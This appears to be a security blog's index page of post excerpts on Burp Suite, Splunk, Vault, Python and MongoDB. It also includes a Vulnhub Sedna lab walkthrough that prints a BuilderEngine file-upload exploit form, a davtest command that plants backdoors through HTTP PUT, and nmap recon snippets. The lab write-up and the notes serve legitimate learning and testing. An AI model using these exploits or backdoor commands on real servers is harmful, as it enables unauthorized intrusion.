Burp Notes

Automatically change value of request parameter Go to Proxy -> Options Click Add under Match and Replace Specify the value to match and the value to replace, such as: Match: uid=bob and Replace with: uid=evilbob This can be done with regex if you’d like, for example: Match: ^Host: foo.example.org$ and Replace with: bar.example.org to rewrite the host header. Feel free to add a Comment: to lend it some context. Intruder Extracting useful info from responses Run your attack Find stuff you want to grep out Click Options Go to Grep - Extract Click Add Search for the item you want to grep out, click the > to highlight it Make sure the Start after expression and End at delimiter match a pattern that will consistently get you the data you want Click OK Clear out the other columns you’ll see by clicking the Clear button under Grep - Match Click the Results tab, observe the item you wanted to grep as a column Export output to excel Click Save -> Results table Specify the columns that you want in the document, and click Save Resource: https://security.stackexchange.com/questions/155434/how-do-i-extract-data-from-response-in-burp-suite-intruder ...

August 16, 2018 · Jayson Grace

Burp Extension Development

Thanks to Al for helping me to compile this. General For debugging (and modularity in general), be sure to separate out your logic from the file with the BurpExtender class, which is what Burp needs for the thing to work. This file should be stripped down to the bare essentials. Jython Install Jython obviously. You’ll find classes you can import from Burp’s extender tab. To import a class, use from burp import <name_here> ...

July 19, 2018 · Jayson Grace

Splunk Notes

URI Path for web application If you want to look at the information associated with a specific uri path for a web application: sitetolookat.com sourcetype=<the sourcetype you have for web stuff> url="/uri/path/file.php*" Add image to dashboard <dashboard> <row> <html> <h1>HTML Panel Example</h1> <p>The HTML panel displays inline HTML.</p> <img src="picture.jpg"/> </html> </row> </dashboard> Resource: https://answers.splunk.com/answers/136162/add-picture-to-dashboard.html View internal splunk logs index=_internal source="*.log" Resource: https://answers.splunk.com/answers/575570/where-can-i-find-the-internal-logs-in-the-splunk-5.html tail -f functionality After running a query, be sure to change the presets for real-time to a window, such as a 5 minute window to show all events that match the input criteria in the past 5 minutes. ...

July 19, 2018 · Jayson Grace

HashiCorp Vault Research

Nice introduction: https://mycodesmells.com/post/introduction-to-vault Fun write-up: https://www.davidbegin.com/cubbyhole-backend-and-response-wrapping/ Token info: https://www.vaultproject.io/docs/concepts/tokens.html Cool dev implementation series with OSX and lastpass: https://blog.alanthatcher.io/fun-and-profit-with-vault-2/ https://blog.alanthatcher.io/fun-and-profit-with-vault-part-2/ https://blog.alanthatcher.io/fun-and-profit-with-vault-part-3/ Single-use implementation: https://www.slalom.com/thinking/managing-secrets-using-hashicorp-vault How-to on Ubuntu: https://www.digitalocean.com/community/tutorials/how-to-securely-manage-secrets-with-hashicorp-vault-on-ubuntu-16-04

July 2, 2018 · Jayson Grace

Python Notes

Install pip If you end up on a system without pip, you can install it from a script. wget https://bootstrap.pypa.io/get-pip.py # Download installation script python3 get-pip.py # Run installation script Read file line-by-line and print each line def print_lines(file): with open(file) as f: for line in f: print(line) Read file into list def return_list(file): with open(file) as f: list = f.readlines() return list Remove line from a file containing a specified string def remove_line_containing_string(file): f = open(file, 'r') contents = f.readlines() f.close() f = open(file, 'w') for line in contents: if not 'some string' in line: f.write(line) f.close() Check if file exists def file_exists(file): if os.path.isfile(file): return True else: return False Find and replace line in a file def find_and_replace_in_file(inp_file, old, new): new_output = '' with open(inp_file, 'U') as f: new_output = f.read() while old in new_output: new_output = new_output.replace(old, new) with open(inp_file, 'w') as f: f.write(new_output) Resource: https://bhagat.blog/2017/01/06/replacing-string-in-a-file-using-python/ ...

January 3, 2018 · Jayson Grace

Old: Modernizing Techvomit

This site used to run on Ghost. I decided to keep this article despite now using Hugo for posterity. Begin old article: I made this decision a couple of years ago on a 4 hour plane ride when I was bored, and wanted to kill two birds with one stone: start learning how some of the AWS services worked, and get a website going. At the time I didn’t really make the site very easy to maintain, and had to learn a couple of lessons over the years as a result. ...

October 2, 2017 · Jayson Grace

Vulnhub - Sedna

These are my notes from running through the Sedna vulnerable VM. Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities. Observe /license.txt - it will inform us that the target web application is running BuilderEngine. Search for an exploit we can use: searchsploit builderengine View the source for the exploit: searchsploit -x 40390 Copy the exploit code into exploit.html: <html> <body> <form method="post" action="http://<vulnerable ip>/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data" > <input type="file" name="files[]" /> <input type="submit" value="send" /> </form> </body> </html> Host it: ...

March 27, 2017 · Jayson Grace

Mongo Cheatsheet

robomongo is an awesome GUI clicky tool. Connect to the DB: mongo <target> Get host information: db.adminCommand({ hostInfo: 1 }); Show users: db.runCommand({ usersInfo: 1 }); Show roles: show roles Show databases: show dbs Use a database: use <db name> Show tables: db.getCollectionNames() // or show tables // or show collections Get data in a table: db.<table name>.find() Get version of mongo: db.version(); Get json dump of the data Create export.js with the following: profileData = db.<collection name>.find(); // for example: db.system.users while(profileData.hasNext()) { printjson(profileData.next()); } Run it like so: ...

February 17, 2017 · Jayson Grace

Abusing HTTP PUT

Detection of vulnerability Run Nikto: nikto --host <target ip>:<target port> If it returns this: + OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server. You are potentially in business. Use davtest to get a backdoor This tool runs all of the payloads that it has, sends backdoors if exploitation is successful, and cleans up after itself. davtest -url "http://${TARGET_IP}:${TARGET_PORT}" -sendbd auto -cleanup PHP Backdoor with Burp Capture a request and send it to repeater. Change the method to PUT and add some php code to the bottom of the request. It should look roughly like this: ...

February 17, 2017 · Jayson Grace

Pentesting notes and snippets

Recon Copy pasta stuff I use for recon - both inside and outside of a target. Host Discovery Ping Sweeping: IP_RANGE='192.168.0.0' SUBNET_MASK='/24' nmap -sn -oA onlineHosts "${IP_RANGE}/${SUBNET_MASK}" -sn: Use ping scan for host discovery (don’t run a port scan) -oA: Store output in normal, XML, and grepable file formats Parse IP Addresses from gnmap file grep "^Host: " onlineHosts.gnmap | grep "Status: Up" | \ cut -d " " -f 2 | sort -n | uniq Skip ICMP checks ...

February 14, 2017 · Jayson Grace